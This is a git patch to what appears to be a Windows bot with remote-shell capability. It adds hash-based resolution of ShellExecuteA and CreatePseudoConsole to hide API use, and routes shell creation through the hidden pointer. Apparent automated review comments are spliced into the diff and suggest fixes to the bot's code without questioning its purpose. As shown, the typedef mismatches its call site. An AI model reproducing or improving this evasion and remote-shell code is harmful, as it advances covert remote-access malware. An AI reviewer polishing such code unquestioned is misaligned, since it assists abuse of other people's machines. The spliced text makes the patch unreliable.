From 35cbd91dd178d3699af9a2e919e9867e27fa91a7 Mon Sep 17 00:00:00 2001
From: CPunch
Date: Fri, 8 Jul 2022 12:54:14 -0500
Subject: [PATCH] Bot: Added oCreatePseudoConsole to laikaO_init()
---
 bot/include/obf.h | 3 +++
 bot/win/winobf.c | 18 ++++++++++++++----
 bot/win/winshell.c | 3 ++-
 3 files changed, 19 insertions(+), 5 deletions(-)
diff --git a/bot/include/obf.h b/bot/include/obf.h
index 95c7507..dd7d579 100644
--- a/bot/include/obf.h
+++ b/bot/include/obf.h
@@ -4,12 +4,15 @@
 #include "laika.h"
 #ifdef _WIN32
+# include
 # include
 /* WINAPI types */
 typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, INT);
+typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, HPCON *);
 extern _ShellExecuteA oShellExecuteA;
+extern _CreatePseudoConsole oCreatePseudoConsole;
 #endif
 void laikaO_init();
diff --git a/bot/win/winobf.c b/bot/win/winobf.c
index dd299c8..d0cd1cd 100644
--- a/bot/win/winobf.c
+++ b/bot/win/winobf.c
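Review bot: The new `_CreatePseudoConsole` typedef declares four parameters, `(COORD, HANDLE, HANDLE, HPCON *)`, but the call this commit redirects in bot/win/winshell.c passes five arguments, `oCreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC)`, so the call cannot compile against this prototype. The documented CreatePseudoConsole signature has a `DWORD dwFlags` parameter between the output handle and the `HPCON *`, which is what the `0` at the call site corresponds to, so the typedef is the side to correct: `typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, DWORD, HPCON *);`. Separately, `_ShellExecuteA` and `_CreatePseudoConsole` begin with an underscore followed by an uppercase letter, a form C reserves for the implementation; a project prefix would avoid that. The two `# include` directives have lost their arguments in this rendering, so which header is being added here cannot be checked from the page.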
@@ -129,15 +129,25 @@ _findByHashFail:
 /* ======================================[[ Exposed API ]]====================================== */
 _ShellExecuteA oShellExecuteA;
+_CreatePseudoConsole oCreatePseudoConsole;
 void laikaO_init() {
 uint32_t hash;
 /* TODO: these library strings should probably be obfuscated (by a skid box maybe?) */
- oShellExecuteA = findByHash("shell32.dll", 0x89858cd3);
+ oShellExecuteA = (_ShellExecuteA)findByHash("shell32.dll", 0x89858cd3);
+ oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
- hash = getHashName("ShellExecuteA"); /* 0x89858cd3 */
- printf("ShellExecuteA: real is %p, hashed is %p. [HASH: %x]\n", (void *)ShellExecuteA,
- findByHash("shell32.dll", hash), hash);
+/*
+ hash = getHashName("CreateProcessA"); // 0x9e687c1d
+ printf("CreateProcessA: real is %p, hashed is %p. [HASH: %x]\n",
+ (void *)CreateProcessA,
+ findByHash("kernel32.dll", hash), hash);
+
+ hash = getHashName("InitializeProcThreadAttributeList");
+ printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
+ (void *)InitializeProcThreadAttributeList,
+ findByHash("kernel32.dll", hash), hash);
+*/
 }
\ No newline at end of file
diff --git a/bot/win/winshell.c b/bot/win/winshell.c
index 4370fd6..80165bb 100644
--- a/bot/win/winshell.c
+++ b/bot/win/winshell.c
@@ -1,5 +1,6 @@
 /* platform specific code for opening shells (pseudo consoles) on windows */
 #include "bot.h"
+#include "obf.h"
 #include "lerror.h"
 #include "lmem.h"
 #include "shell.h"
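Review bot: After this change the `uint32_t hash;` local in `laikaO_init()` is declared but never used, because every statement that assigned or read it now sits inside the `/* ... */` block, so the declaration should go along with that commented-out debugging code rather than being carried in the function. The two `findByHash` results are cast and stored without any check, so a lookup that yields a null pointer is only discovered at the first call through `oCreatePseudoConsole` in bot/win/winshell.c; the assignments are the place to verify the result. The file also still ends without a trailing newline, as the `\ No newline at end of file` marker shows.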
@@ -128,7 +129,7 @@ HRESULT CreatePseudoConsoleAndPipes(HPCON *phPC, HANDLE *phPipeIn, HANDLE *phPip
 return HRESULT_FROM_WIN32(GetLastError());
 /* create the pseudo console of the required size, attached to the PTY - end of the pipes */
- hr = CreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC);
+ hr = oCreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC);
 /* we can close the handles to the PTY-end of the pipes here because the handles are dup'ed into the ConHost and will be released